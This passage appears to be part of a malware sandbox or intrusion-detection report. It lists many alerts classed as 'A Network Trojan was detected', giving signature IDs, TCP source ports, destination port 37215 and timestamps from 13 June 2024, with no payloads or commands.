              SID:2835222
              Source Port:37350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913960
              SID:2829579
              Source Port:36564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177533
              SID:2829579
              Source Port:38216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076709
              SID:2829579
              Source Port:37756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087560
              SID:2829579
              Source Port:52116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867313
              SID:2835222
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632501
              SID:2835222
              Source Port:36582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043211
              SID:2835222
              Source Port:49318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:56.092315
              SID:2840515
              Source Port:39994
              Destination Port:4554
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043409
              SID:2835222
              Source Port:56690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096315
              SID:2829579
              Source Port:60358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177495
              SID:2835222
              Source Port:49528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231862
              SID:2835222
              Source Port:55236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302253
              SID:2829579
              Source Port:59410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370433
              SID:2835222
              Source Port:58460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987476
              SID:2835222
              Source Port:48790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156304
              SID:2835222
              Source Port:33146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475714
              SID:2835222
              Source Port:47838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842709
              SID:2829579
              Source Port:36736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546096
              SID:2835222
              Source Port:35756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253266
              SID:2829579
              Source Port:55744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942034
              SID:2829579
              Source Port:39056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343744
              SID:2829579
              Source Port:37342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870887
              SID:2835222
              Source Port:55156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150789
              SID:2829579
              Source Port:38678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654679
              SID:2829579
              Source Port:53218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028075
              SID:2835222
              Source Port:43842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132036
              SID:2829579
              Source Port:49366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696537
              SID:2829579
              Source Port:51256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301355
              SID:2835222
              Source Port:40104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674645
              SID:2835222
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844142
              SID:2835222
              Source Port:50094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660324
              SID:2829579
              Source Port:35898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437480
              SID:2829579
              Source Port:55878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755554
              SID:2835222
              Source Port:32960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258789
              SID:2835222
              Source Port:32844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095429
              SID:2835222
              Source Port:44998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132502
              SID:2835222
              Source Port:40356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868268
              SID:2835222
              Source Port:52672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546458
              SID:2829579
              Source Port:50232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042013
              SID:2835222
              Source Port:60958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487642
              SID:2835222
              Source Port:49760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697251
              SID:2829579
              Source Port:60238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834765
              SID:2829579
              Source Port:58422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416576
              SID:2835222
              Source Port:51000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671405
              SID:2829579
              Source Port:60060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781194
              SID:2835222
              Source Port:50342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215640
              SID:2829579
              Source Port:47798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304429
              SID:2829579
              Source Port:56184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215964
              SID:2829579
              Source Port:59716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057433
              SID:2835222
              Source Port:39376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240460
              SID:2835222
              Source Port:46600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407753
              SID:2829579
              Source Port:46894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572214
              SID:2829579
              Source Port:41160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376038
              SID:2835222
              Source Port:56908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569145
              SID:2835222
              Source Port:33352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485850
              SID:2829579
              Source Port:57950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272579
              SID:2829579
              Source Port:56198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092072
              SID:2829579
              Source Port:45528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508720
              SID:2835222
              Source Port:38258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153214
              SID:2829579
              Source Port:48042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024315
              SID:2829579
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368896
              SID:2829579
              Source Port:42562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309270
              SID:2829579
              Source Port:41744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344454
              SID:2829579
              Source Port:54438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421690
              SID:2835222
              Source Port:37624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568792
              SID:2829579
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107112
              SID:2835222
              Source Port:49664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194797
              SID:2835222
              Source Port:33110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213232
              SID:2835222
              Source Port:58598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567841
              SID:2835222
              Source Port:37686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995350
              SID:2829579
              Source Port:43918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227136
              SID:2829579
              Source Port:41992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159211
              SID:2829579
              Source Port:56870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107330
              SID:2835222
              Source Port:51010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421486
              SID:2835222
              Source Port:44192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277300
              SID:2829579
              Source Port:58126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344589
              SID:2835222
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150244
              SID:2835222
              Source Port:50202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153610
              SID:2835222
              Source Port:57028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439565
              SID:2835222
              Source Port:47370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823357
              SID:2835222
              Source Port:36876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274887
              SID:2835222
              Source Port:58192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832038
              SID:2835222
              Source Port:36682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868217
              SID:2835222
              Source Port:44056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316083
              SID:2835222
              Source Port:45474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091567
              SID:2829579
              Source Port:40540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270642
              SID:2829579
              Source Port:48258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509005
              SID:2829579
              Source Port:42568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528289
              SID:2835222
              Source Port:53796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610531
              SID:2835222
              Source Port:49878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914186
              SID:2829579
              Source Port:35502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457322
              SID:2829579
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011413
              SID:2835222
              Source Port:36376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975141
              SID:2829579
              Source Port:54044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403813
              SID:2829579
              Source Port:60394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707511
              SID:2835222
              Source Port:34734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013029
              SID:2835222
              Source Port:57492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096257
              SID:2835222
              Source Port:44284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254913
              SID:2829579
              Source Port:46374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262789
              SID:2829579
              Source Port:57416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609004
              SID:2829579
              Source Port:45792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823811
              SID:2835222
              Source Port:42470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937476
              SID:2835222
              Source Port:51444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.454035
              SID:2835222
              Source Port:39326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870319
              SID:2829579
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677203
              SID:2829579
              Source Port:54576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252640
              SID:2835222
              Source Port:44384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298398
              SID:2835222
              Source Port:58608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991411
              SID:2835222
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749841
              SID:2835222
              Source Port:36390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181844
              SID:2829579
              Source Port:55432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305823
              SID:2835222
              Source Port:36060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505409
              SID:2829579
              Source Port:56790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403640
              SID:2829579
              Source Port:57808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553849
              SID:2835222
              Source Port:59726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042504
              SID:2829579
              Source Port:33142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259439
              SID:2829579
              Source Port:44182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546377
              SID:2835222
              Source Port:57080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830689
              SID:2835222
              Source Port:55202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914813
              SID:2835222
              Source Port:49462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316948
              SID:2829579
              Source Port:48446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571711
              SID:2835222
              Source Port:56422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800648
              SID:2829579
              Source Port:55604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279974
              SID:2829579
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027099
              SID:2829579
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416735
              SID:2835222
              Source Port:56364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697728
              SID:2829579
              Source Port:42832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213189
              SID:2829579
              Source Port:46556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567897
              SID:2829579
              Source Port:59144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088948
              SID:2829579
              Source Port:48290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728732
              SID:2829579
              Source Port:47650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730698
              SID:2835222
              Source Port:45716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174094
              SID:2835222
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108149
              SID:2835222
              Source Port:60140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573490
              SID:2835222
              Source Port:56040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192136
              SID:2835222
              Source Port:33028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458595
              SID:2835222
              Source Port:50666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994620
              SID:2835222
              Source Port:39462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423554
              SID:2829579
              Source Port:52940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820944
              SID:2829579
              Source Port:49604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128952
              SID:2835222
              Source Port:51364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223946
              SID:2835222
              Source Port:55700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503450
              SID:2835222
              Source Port:47828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566622
              SID:2835222
              Source Port:46168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350062
              SID:2829579
              Source Port:35536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566970
              SID:2829579
              Source Port:57270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992052
              SID:2835222
              Source Port:35388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245758
              SID:2829579
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259155
              SID:2829579
              Source Port:41578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097800
              SID:2835222
              Source Port:57856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134530
              SID:2835222
              Source Port:53262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975204
              SID:2835222
              Source Port:38792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972742
              SID:2829579
              Source Port:55652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509902
              SID:2835222
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091048
              SID:2829579
              Source Port:38098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042614
              SID:2835222
              Source Port:54282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697053
              SID:2835222
              Source Port:40834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040720
              SID:2829579
              Source Port:34136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710921
              SID:2829579
              Source Port:58168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952411
              SID:2835222
              Source Port:38008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091427
              SID:2829579
              Source Port:40620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615110
              SID:2835222
              Source Port:50002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422275
              SID:2835222
              Source Port:38228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790190
              SID:2829579
              Source Port:55514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130392
              SID:2835222
              Source Port:45554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275137
              SID:2835222
              Source Port:58914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359291
              SID:2835222
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671337
              SID:2835222
              Source Port:55610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349373
              SID:2835222
              Source Port:35408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632518
              SID:2829579
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785879
              SID:2835222
              Source Port:33208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093735
              SID:2835222
              Source Port:56822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572827
              SID:2835222
              Source Port:47466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783425
              SID:2829579
              Source Port:34618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833602
              SID:2829579
              Source Port:47912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101266
              SID:2835222
              Source Port:58156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310053
              SID:2835222
              Source Port:53702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547164
              SID:2829579
              Source Port:46750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978121
              SID:2829579
              Source Port:47302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487767
              SID:2829579
              Source Port:43626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217351
              SID:2835222
              Source Port:58826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353874
              SID:2829579
              Source Port:57250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822214
              SID:2829579
              Source Port:35160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338057
              SID:2835222
              Source Port:56220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758425
              SID:2835222
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546217
              SID:2829579
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276165
              SID:2829579
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017030
              SID:2835222
              Source Port:48872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409479
              SID:2835222
              Source Port:51866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525538
              SID:2835222
              Source Port:42872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913710
              SID:2835222
              Source Port:46690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993922
              SID:2829579
              Source Port:57572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214402
              SID:2829579
              Source Port:52824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.190957
              SID:2835222
              Source Port:41020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786656
              SID:2835222
              Source Port:56952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057334
              SID:2829579
              Source Port:39234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565829
              SID:2829579
              Source Port:50590
              Destination Port:37215
